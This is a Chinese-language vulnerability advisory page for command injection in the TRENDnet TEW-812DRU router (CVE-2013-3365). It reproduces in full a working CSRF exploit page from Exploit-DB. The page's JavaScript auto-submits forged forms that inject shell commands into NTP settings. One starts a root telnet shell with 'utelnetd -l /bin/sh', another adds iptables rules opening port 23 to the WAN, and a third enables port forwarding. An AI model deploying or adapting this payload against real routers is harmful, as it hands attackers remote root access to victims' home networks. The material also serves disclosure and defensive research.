Trendnet TEW-812DRU多个命令注入漏洞（CVE-2013-3365）

发布日期：2013-07-28
更新日期：2013-07-31受影响系统：
trendnet TEW-812DRU
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 61492
CVE（CAN） ID: CVE-2013-3365Trendnet TEW-812DRU是双宽带无线路由器。TRENDnet TEW-812DRU允许攻击者在受影响设备上下文中执行任意命令。<*来源：Jacob Holcomb
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！TRENDnet TEW-812DRU CSRF/Command Injection Root Exploit EDB-ID: 27177 CVE: 2013-3098 OSVDB-ID: N/A
Author: Jacob Holcomb Published: 2013-07-28 Verified: Not Verified
Exploit Code: Download Vulnerable App: N/A
Rating
Overall:
<html>
<head>
<title> TRENDnet TEW-812DRU CSRF - Command Injection > Shell Exploit.</title>
<！--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Command Injection（s） Discovered by: Jacob Holcomb & Kedy Liu - Security Analysts @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
# CVE: CSRF - CVE-2013-3098 & Multiple Command Injection - CVE-2013-3365
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<img src="http://192.168.10.1/Images/logo.gif"><！--TRENDnet Logo for attack launch page -->
<h1>Please wait... </h1>
<script type="text/javascript">
//Request to enable port forwarding to the routers internal IP on port 23
//This exploit works without this request, but the exploit was more stable with it, so its included in thos PoC.
function RF1（）{
document.write（"<form name="portfwd" target ="_blank" action="http://192.168.10.1/uapply.cgi" method="post">"+
"<input type="hidden" name="page" value="/advanced/single_port.asp">"+
"<input type="hidden" name="forward_port_enable" value="0">"+
"<input type="hidden" name="forward_port" value="24">"+
"<input type="hidden" name="forward_port_proto0" value="tcp">"+
"<input type="hidden" name="forward_port_from_start0" value="23">"+
"<input type="hidden" name="forward_port_from_end0" value="23">"+
"<input type="hidden" name="forward_port_to_ip0" value="192.168.10.1">"+
"<input type="hidden" name="forward_port_to_start0" value="23">"+
"<input type="hidden" name="forward_port_to_end0" value="23">"+
"<input type="hidden" name="schedule0" value="0">"+
"<input type="hidden" name="forward_port_enable0" value="on">"+
"<input tpye="hidden" name="action" value="Apply">"+
"</form>"）;
}//Request to enable telnet
function RF2（）{
document.write（"<form name="enable23" target="_blank" action="http://192.168.10.1/setNTP.cgi" method="post">"+
"<input type="hidden" name="page" value="/adm/time.asp">"+
"<input type="hidden" name="DSTenable" value="on">"+
"<input type="hidden" name="NtpDstEnable" value="1">"+
"<input type="hidden" name="NtpDstOffset" value="`utelnetd -l /bin/sh`">"+
"<input type="hidden" name="NtpDstStart" value="030102">"+
"<input type="hidden" name="tz_daylight_start_month_select" value="03">"+
"<input type="hidden" name="tz_daylight_start_day_select" value="01">"+
"<input type="hidden" name="tz_daylight_start_time_select" value="02">"+
"<input type="hidden" name="NtpDstEnd" value="100102">"+
"<input type="hidden" name="tz_daylight_end_month_select" value="10">"+
"<input type="hidden" name="tz_daylight_end_day_select" value="01">"+
"<input type="hidden" name="tz_daylight_end_time_select" value="02">"+
"<input type="hidden" name="ntp_server" value="1">"+
"<input type="hidden" name="NTPServerIP" value="pool.ntp.org">"+
"<input type="hidden" name="time_zone" value="UCT_-11">"+
"<input type="hidden" name="timer_interval" value="300">"+
"<input type="hidden" name="manual_year_select" value="2012">"+
"<input type="hidden" name="manual_month_select" value="01">"+
"<input type="hidden" name="manual_day_select" value="01">"+
"<input type="hidden" name="manual_hour_select" value="00">"+
"<input type="hidden" name="manual_min_select" value="19">"+
"<input type="hidden" name="manual_sec_select" value="57">"+
"<input type="hidden" name="timeTag" value="manual">"+
"</form>"）;
}//Request to change iptables to allow port 23 from the WAN.
function RF3（）{
document.write（
"<form name="ipTableRule" target="_blank" action="http://192.168.10.1/setNTP.cgi" method="post">"+
"<input type="hidden" name="page" value="/adm/time.asp">"+
"<input type="hidden" name="DSTenable" value="on">"+
"<input type="hidden" name="NtpDstEnable" value="1">"+
"<input type="hidden" name="NtpDstOffset" value="3600">"+
"<input type="hidden" name="NtpDstStart" value="030102">"+
"<input type="hidden" name="tz_daylight_start_month_select" value="03">"+
"<input type="hidden" name="tz_daylight_start_day_select" value="01">"+
"<input type="hidden" name="tz_daylight_start_time_select" value="02">"+
"<input type="hidden" name="NtpDstEnd" value="`count=0;while [ $count -le 25 ]; do iptables -I INPUT 1 -p tcp --dport 23 -j ACCEPT;（（ count++ ））;done;`">"+
"<input type="hidden" name="tz_daylight_end_month_select" value="10">"+
"<input type="hidden" name="tz_daylight_end_day_select" value="01">"+
"<input type="hidden" name="tz_daylight_end_time_select" value="02">"+
"<input type="hidden" name="ntp_server" value="1">"+
"<input type="hidden" name="NTPServerIP" value="pool.ntp.org">"+
"<input type="hidden" name="time_zone" value="UCT_-11">"+
"<input type="hidden" name="timer_interval" value="300">"+
"<input type="hidden" name="manual_year_select" value="2012">"+
"<input type="hidden" name="manual_month_select" value="01">"+
"<input type="hidden" name="manual_day_select" value="01">"+
"<input type="hidden" name="manual_hour_select" value="00">"+
"<input type="hidden" name="manual_min_select" value="19">"+
"<input type="hidden" name="manual_sec_select" value="57">"+
"<input type="hidden" name="timeTag" value="manual">"+
"</form>"）;
}function createPage（）{
RF1（）;
RF2（）;
RF3（）;
document.write（"<iframe src="http://192.168.10.1/" target="_blank" width="100%" height="100%" frameborder="0" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0;"></iframe>"）;
}function _portfwd（）{
document.portfwd.submit（）;
}function _enable23（）{
document.enable23.submit（）;
}function _ipTableRule（）{
document.ipTableRule.submit（）;i
}//Called Functions
createPage（）

for（var i = 0; i < 3; i++）{
if（i == 0）{
window.setTimeout（_portfwd, 1000）;
}
else if（i == 1）{
window.setTimeout（_enable23, 2000）;
}
else if（i == 2）{
window.setTimeout（_ipTableRule, 4000）;
}
else{
continue;
}
}
</script>
</body>
</html>
Comments
No comments so far© Offensive Security 2013建议：
--------------------------------------------------------------------------------
厂商补丁：trendnet
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.trendnet.com/products/proddetail.asp？prod=100_TEW-812DRU&cat=41Wireshark多个拒绝服务漏洞ASUS RT-AC66U多个缓冲区溢出漏洞（CVE-2013-4659）相关资讯 TRENDnet TEW-812DRU 本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容